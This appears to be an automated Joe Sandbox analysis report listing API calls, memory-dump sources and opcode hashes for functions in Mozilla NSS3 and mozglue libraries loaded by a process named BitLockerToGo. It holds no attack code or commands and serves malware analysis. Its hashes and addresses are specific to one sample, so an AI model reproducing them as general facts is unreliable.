                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2926855110-0
                                                                                                                                                      • Opcode ID: ac4671c46ef319fea7bb9953b248456edcdc1e9a5c48c0b4a08ef66bf6987436
                                                                                                                                                      • Instruction ID: e1f08670bf30c52dadd48cef5a3abcc00a54ce30a679c56a836183a6038f5b54
                                                                                                                                                      • Opcode Fuzzy Hash: ac4671c46ef319fea7bb9953b248456edcdc1e9a5c48c0b4a08ef66bf6987436
                                                                                                                                                      • Instruction Fuzzy Hash: 4F3149B1E006165FEB00CF25CC409BF777AAF94318B588128E8199B740EF31DC2587B5
                                                                                                                                                      APIs
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C841D0F
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,6C841BE3,?,?,6C841D96,00000000), ref: 6C841D18
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,6C841BE3,?,?,6C841D96,00000000), ref: 6C841D4C
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C841DB7
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?), ref: 6C841DC0
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C841DDA
                                                                                                                                                        • Part of subcall function 6C841EF0: GetCurrentThreadId.KERNEL32 ref: 6C841F03
                                                                                                                                                        • Part of subcall function 6C841EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C841DF2,00000000,00000000), ref: 6C841F0C
                                                                                                                                                        • Part of subcall function 6C841EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C841F20
                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C841DF4
                                                                                                                                                        • Part of subcall function 6C80CA10: malloc.MOZGLUE(?), ref: 6C80CA26
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1880959753-0
                                                                                                                                                      • Opcode ID: 570f1b1c8fe89c62f029484c9424a38ce1149eaf6b9a7124051373aee850d5bf
                                                                                                                                                      • Instruction ID: 199e68a50ee0e7201f9fcb62d9f7a09b75a5872c711eaba06fd2776614d91ec8
                                                                                                                                                      • Opcode Fuzzy Hash: 570f1b1c8fe89c62f029484c9424a38ce1149eaf6b9a7124051373aee850d5bf
                                                                                                                                                      • Instruction Fuzzy Hash: 46415CB52017049FCB20DF29C588B6ABBF5FF49318F10882DE95A87B41DB71E854CBA1
                                                                                                                                                      APIs
                                                                                                                                                      • PR_Now.NSS3 ref: 6C938C7C
                                                                                                                                                        • Part of subcall function 6C9D9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DC6
                                                                                                                                                        • Part of subcall function 6C9D9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CA20A27), ref: 6C9D9DD1
                                                                                                                                                        • Part of subcall function 6C9D9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C9D9DED
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C938CB0
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C938CD1
                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C938CE5
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C938D2E
                                                                                                                                                      • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C938D62
                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C938D93
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3131193014-0
                                                                                                                                                      • Opcode ID: 6733c4e54765902a508dbaac80329090df874a7ace335826f89db5eaa1649151
                                                                                                                                                      • Instruction ID: 42b24b91fc9cddb128c8f8ca5b2096001617be176b4ca1ecaf90105ed9e6b0b8
                                                                                                                                                      • Opcode Fuzzy Hash: 6733c4e54765902a508dbaac80329090df874a7ace335826f89db5eaa1649151
                                                                                                                                                      • Instruction Fuzzy Hash: FE316871A00221AFDB099F68CC44BAAB7B4BF64318F14113BEA2DA7B50D730E915CBD5
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C92E728,?,00000038,?,?,00000000), ref: 6C932E52
                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C932E66
                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C932E7B
                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C932E8F
                                                                                                                                                      • PL_HashTableLookup.NSS3(?,?), ref: 6C932E9E
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C932EAB
                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C932F0D
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3106257965-0
                                                                                                                                                      • Opcode ID: 348566ad4b7a6617a95bedcd275eda80feb2c7b7ec92dc2cbf70420f71ab8f84
                                                                                                                                                      • Instruction ID: 2f429a0a2c1a296b3705bc3432885ba7ea55b78072dbb4948e0ebe1ce501c0eb
                                                                                                                                                      • Opcode Fuzzy Hash: 348566ad4b7a6617a95bedcd275eda80feb2c7b7ec92dc2cbf70420f71ab8f84
                                                                                                                                                      • Instruction Fuzzy Hash: 8431F676A00616ABEB00AF28DC45876B778FF6525DB088174ED0C87B12E731DC65C7E0
                                                                                                                                                      APIs
                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?,6C97CD93,?), ref: 6C97CEEE
                                                                                                                                                        • Part of subcall function 6C9714C0: TlsGetValue.KERNEL32 ref: 6C9714E0
                                                                                                                                                        • Part of subcall function 6C9714C0: EnterCriticalSection.KERNEL32 ref: 6C9714F5
                                                                                                                                                        • Part of subcall function 6C9714C0: PR_Unlock.NSS3 ref: 6C97150D
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6C97CD93,?), ref: 6C97CEFC
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C9710F3
                                                                                                                                                        • Part of subcall function 6C9710C0: EnterCriticalSection.KERNEL32(?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97110C
                                                                                                                                                        • Part of subcall function 6C9710C0: PL_ArenaAllocate.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971141
                                                                                                                                                        • Part of subcall function 6C9710C0: PR_Unlock.NSS3(?,?,?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C971182
                                                                                                                                                        • Part of subcall function 6C9710C0: TlsGetValue.KERNEL32(?,6C918802,00000000,00000008,?,6C90EF74,00000000), ref: 6C97119C
                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6C97CD93,?), ref: 6C97CF0B
                                                                                                                                                        • Part of subcall function 6C970840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C9708B4
                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6C97CD93,?), ref: 6C97CF1D
                                                                                                                                                        • Part of subcall function 6C96FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C968D2D,?,00000000,?), ref: 6C96FB85
                                                                                                                                                        • Part of subcall function 6C96FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C96FBB1
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF47
                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF67
                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,00000000,6C97CD93,?,?,?,?,?,?,?,?,?,?,?,6C97CD93,?), ref: 6C97CF78
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4291907967-0
                                                                                                                                                      • Opcode ID: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                      • Instruction ID: 28ae2a478ea12722390467af59fab903a5df94966ef1a1ea1a9a7918cbf3d0ee
                                                                                                                                                      • Opcode Fuzzy Hash: a3aab832d6a22432be4a6ae88c8f79b101dc4fa96841c8453af480ac5133103c
                                                                                                                                                      • Instruction Fuzzy Hash: 5911D2A1B022009BEB20AE766C41BABB5EC9F6554DF004039EC0DD7B41FB60DA1886B1
                                                                                                                                                      APIs
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8384F3
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83850A
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83851E
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83855B
                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83856F
                                                                                                                                                      • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8385AC
                                                                                                                                                        • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C83767F
                                                                                                                                                        • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C837693
                                                                                                                                                        • Part of subcall function 6C837670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C8385B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8376A7
                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C8385B2
                                                                                                                                                        • Part of subcall function 6C815E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C815EDB
                                                                                                                                                        • Part of subcall function 6C815E90: memset.VCRUNTIME140(6C857765,000000E5,55CCCCCC), ref: 6C815F27
                                                                                                                                                        • Part of subcall function 6C815E90: LeaveCriticalSection.KERNEL32(?), ref: 6C815FB2
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2666944752-0
                                                                                                                                                      • Opcode ID: c42991278f5d22b7111bed5a6900337b673c3d1f89ab641f572ab3ff63caf7af
                                                                                                                                                      • Instruction ID: cb88dd8be3e2657bfeae855c7db0da3eea8394fbd9c70964a1e30287ac8b5d9d
                                                                                                                                                      • Opcode Fuzzy Hash: c42991278f5d22b7111bed5a6900337b673c3d1f89ab641f572ab3ff63caf7af
                                                                                                                                                      • Instruction Fuzzy Hash: D5218B742016118FDB25DB68C988A5AB7B5AF8430CF245C2EE55FC3B41EB35E948CBE1
                                                                                                                                                      APIs
                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C928C1B
                                                                                                                                                      • EnterCriticalSection.KERNEL32 ref: 6C928C34
                                                                                                                                                      • PL_ArenaAllocate.NSS3 ref: 6C928C65
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C928C9C
                                                                                                                                                      • PR_Unlock.NSS3 ref: 6C928CB6
                                                                                                                                                        • Part of subcall function 6C9BDD70: TlsGetValue.KERNEL32 ref: 6C9BDD8C
                                                                                                                                                        • Part of subcall function 6C9BDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C9BDDB4
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                      • String ID: KRAM
                                                                                                                                                      • API String ID: 4127063985-3815160215
                                                                                                                                                      • Opcode ID: c6aeca87de2ac4dc2bd189ecf4527a948689a8b421a472ea2cd85e8238ccabf1
                                                                                                                                                      • Instruction ID: d56b621d6b6584c5a9aa95d884a77b0a4ed8f2f12c649bbfadd41f659cd475d8
                                                                                                                                                      • Opcode Fuzzy Hash: c6aeca87de2ac4dc2bd189ecf4527a948689a8b421a472ea2cd85e8238ccabf1
                                                                                                                                                      • Instruction Fuzzy Hash: DF217EB26156118FD704EF38C484569BBF4FF55308F05896ED8C88B705EB39D886CB95
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 6C82CBE8: GetCurrentProcess.KERNEL32(?,6C7F31A7), ref: 6C82CBF1
                                                                                                                                                        • Part of subcall function 6C82CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C7F31A7), ref: 6C82CBFA
                                                                                                                                                        • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C804A68), ref: 6C83945E
                                                                                                                                                        • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C839470
                                                                                                                                                        • Part of subcall function 6C839420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C839482
                                                                                                                                                        • Part of subcall function 6C839420: __Init_thread_footer.LIBCMT ref: 6C83949F
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C83F619
                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C83F598), ref: 6C83F621
                                                                                                                                                        • Part of subcall function 6C8394D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8394EE
                                                                                                                                                        • Part of subcall function 6C8394D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C839508
                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C83F637
                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F645
                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C87F4B8,?,?,00000000,?,6C83F598), ref: 6C83F663
                                                                                                                                                      Strings
                                                                                                                                                      • [D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C83F62A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                      • String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
                                                                                                                                                      • API String ID: 1579816589-753366533
                                                                                                                                                      • Opcode ID: fa8a5c2291dcb4557209bad9a18f0503314755c4bfb9736a93a5018ba772c69b
                                                                                                                                                      • Instruction ID: d9272e087cf0b330c5065a70e5be89644a2a9b4ca6c3aca6e4242c849ea964a3
                                                                                                                                                      • Opcode Fuzzy Hash: fa8a5c2291dcb4557209bad9a18f0503314755c4bfb9736a93a5018ba772c69b
                                                                                                                                                      • Instruction Fuzzy Hash: FF11C871204124ABCB30AF59C64C9AA7779FB9635CB502875EA0983F01EB71AC25CBF0
                                                                                                                                                      APIs
                                                                                                                                                      • PR_EnterMonitor.NSS3 ref: 6CA22CA0
                                                                                                                                                      • PR_ExitMonitor.NSS3 ref: 6CA22CBE
                                                                                                                                                      • calloc.MOZGLUE(00000001,00000014), ref: 6CA22CD1
                                                                                                                                                      • strdup.MOZGLUE(?), ref: 6CA22CE1
                                                                                                                                                      • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CA22D27
                                                                                                                                                      Strings
                                                                                                                                                      • Loaded library %s (static lib), xrefs: 6CA22D22
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084496641.000000006C891000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C890000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084477777.000000006C890000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084634850.000000006CA2F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084670849.000000006CA6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084686880.000000006CA6F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084702944.000000006CA70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084718355.000000006CA75000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c890000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                      • String ID: Loaded library %s (static lib)
                                                                                                                                                      • API String ID: 3511436785-2186981405
                                                                                                                                                      • Opcode ID: 04440f78faec74f62a8bb41a8bd7379a42fde43b8c70a43e3c00db15bc380aa1
                                                                                                                                                      • Instruction ID: 12204d2837d1120dca2d66af6cf6eb84a8d483c9b46e8d1e1a92c65e50408963
                                                                                                                                                      • Opcode Fuzzy Hash: 04440f78faec74f62a8bb41a8bd7379a42fde43b8c70a43e3c00db15bc380aa1
                                                                                                                                                      • Instruction Fuzzy Hash: B91100B86103219FEB099F15D808AA637B5AB5532DF1CC23DD80987B01D735E88ACBB1
                                                                                                                                                      APIs
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C82CFAE,?,?,?,6C7F31A7), ref: 6C8305FB
                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C82CFAE,?,?,?,6C7F31A7), ref: 6C830616
                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C7F31A7), ref: 6C83061C
                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C7F31A7), ref: 6C830627
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000001.00000002.2084369153.000000006C7F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C7F0000, based on PE: true
                                                                                                                                                      • Associated: 00000001.00000002.2084351279.000000006C7F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084421648.000000006C86D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084443046.000000006C87E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      • Associated: 00000001.00000002.2084461949.000000006C882000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_1_2_6c7f0000_BitLockerToGo.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _writestrlen
                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                      • API String ID: 2723441310-2186867486
                                                                                                                                                      • Opcode ID: 9a61f7fb5c1a929388e1e4f7ce94759324b66fc006a3e6319a79e54543122310
                                                                                                                                                      • Instruction ID: 94d12b8f73fd4d4bb86b10fa4844cd085973701bd829fc669bb6d22d840c8f3f
                                                                                                                                                      • Opcode Fuzzy Hash: 9a61f7fb5c1a929388e1e4f7ce94759324b66fc006a3e6319a79e54543122310
                                                                                                                                                      • Instruction Fuzzy Hash: 03E08CE2A0116037F924225AAC8ADBB761CDBC6538F080039FD0D83702E94AAD1A91F6
                                                                                                                                                      APIs
                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C9B3046
                                                                                                                                                        • Part of subcall function 6C99EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C99EE85
                                                                                                                                                      • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C987FFB), ref: 6C9B312A
                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C9B3154
                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C9B2E8B
                                                                                                                                                        • Part of subcall function 6C9BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C9BC2BF
                                                                                                                                                        • Part of subcall function 6C99F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C989BFF,?,00000000,00000000), ref: 6C99F134
